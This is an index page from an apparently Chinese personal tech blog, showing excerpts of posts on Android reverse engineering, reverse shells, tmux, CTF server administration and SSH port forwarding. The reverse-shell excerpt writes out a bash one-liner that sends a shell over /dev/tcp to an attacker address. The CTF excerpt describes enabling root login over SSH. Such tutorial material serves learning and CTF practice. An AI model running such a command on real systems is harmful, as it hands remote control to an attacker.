android逆向准备工作 发表于 2018-02-08 | 分类于 android 0、笔者自述说实话,对于Android逆向,我还只处在开始调试开发的阶段,但是实在是受不了Android中的流氓软件以及流氓事件,我打算进行简单的安卓逆向。刚开始的目标是去除app中的广告页(现在发现十分困难)! 1、安卓逆向的环境安装1.1 jdk安装jdk安装实在指导很多,但是这儿还是得提醒一句 ... 阅读全文 »
反弹Shell 发表于 2017-12-09 | 分类于 web 假设攻击端为10.0.0.1,接收端口为8080 服务器端为10.0.0.2 1、Bash关于bash中的重定向知识,可以参考shell之后的操作 服务器端: 1bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1bash -c 's ... 阅读全文 »
tmux使用教程 发表于 2017-12-09 | 分类于 tool 为什么要用 Tmuxtmux 在很多方面都很有用。就我而言,由于 tmux 允许随时随地断开或重新接入会话(Session),所以最大的作用就是在远程服务器上持久地保存工作状态。 例如,你可以在服务器上新建一个会话并命名为“nodeapi”,然后用它来挖掘 node REST API 的漏洞(这是我 ... 阅读全文 »
ctf运维的基本操作 发表于 2017-12-09 | 分类于 运维 1、ssh相关操作启动ssh(root亦可登录) 12345service sshd startvi /etc/ssh/sshd_config- 取消PasswordAuthentication yes的注释- 将#PermitRootLogin prohibit-password后加入一行Perm ... 阅读全文 »
ssh端口转发 发表于 2017-12-07 | 分类于 web 第一部分 概述当你在咖啡馆享受免费 WiFi 的时候,有没有想到可能有人正在窃取你的密码及隐私信息?当你发现实验室的防火墙阻止了你的网络应用端口,是不是有苦难言?来看看 SSH 的端口转发功能能给我们带来什么好处吧! 端口转发概述让我们先来了解一下端口转发的概念吧。我们知道,SSH 会自动加密和解密 ... 阅读全文 »